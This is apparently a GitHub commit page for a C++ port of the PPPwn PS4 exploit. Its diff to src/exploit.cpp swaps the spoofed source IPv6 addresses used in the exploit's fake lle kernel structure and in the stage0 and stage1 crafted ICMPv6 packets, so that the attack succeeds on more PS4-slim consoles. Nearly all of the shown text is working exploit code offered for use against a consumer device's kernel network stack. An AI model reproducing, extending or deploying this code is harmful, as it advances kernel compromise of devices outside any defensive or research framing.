Skip to content

Commit ed5f907

Browse files
maxou2600maxou2600
authored
Use IPv6 address that works on all devices. Thanks to Borris-ta. (xfangfang#74)
Updated exploit.cpp according to original PPPwn repository to make the exploit working on some previously non-working PS4-slim. Thanks to TheOfficialFlow and Borris-ta for their findings.
1 parent cbc09a3 commit ed5f907

File tree

1 file changed

+5
-5
lines changed

1 file changed

+5
-5
lines changed

src/exploit.cpp

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -50,7 +50,7 @@
5050

5151
const static std::string SOURCE_MAC = "41:41:41:41:41:41";
5252
const static std::string SOURCE_IPV4 = "41.41.41.41";
53-
const static std::string SOURCE_IPV6 = "fe80::4141:4141:4141:4141";
53+
const static std::string SOURCE_IPV6 = "fe80::9f9f:41ff:9f9f:41ff";
5454

5555
const static std::string TARGET_IPV4 = "42.42.42.42";
5656

@@ -550,7 +550,7 @@ std::vector<uint8_t> Exploit::build_fake_lle(Exploit *self) {
550550
V32(fake_lle, 0xC4, 0); // sin6_flowinfo
551551
// sin6_addr
552552
V64BE(fake_lle, 0xC8, 0xfe80000100000000);
553-
V64BE(fake_lle, 0xD0, 0x4141414141414141);
553+
V64BE(fake_lle, 0xD0, 0x9f9f41ff9f9f41ff);
554554
V32(fake_lle, 0xD8, 0); // sin6_scope_id
555555

556556
// pad
@@ -737,7 +737,7 @@ int Exploit::stage0() {
737737
}
738738

739739
std::stringstream sourceIpv6;
740-
sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":4141:4141:4141";
740+
sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
741741
{
742742
auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,
743743
pcpp::IPv6Address(sourceIpv6.str()), this->target_ipv6);
@@ -860,7 +860,7 @@ int Exploit::stage1() {
860860

861861
sourceIpv6.clear();
862862
sourceIpv6.str("");
863-
sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":4141:4141:4141";
863+
sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
864864

865865
{
866866
auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,
@@ -1137,4 +1137,4 @@ void Exploit::stop() {
11371137
// Force stop capture even if blocking mode is enabled
11381138
pcap_breakloop(pcapHandle(*dev));
11391139
stopThread(*dev) = true;
1140-
}
1140+
}

0 commit comments

Comments
 (0)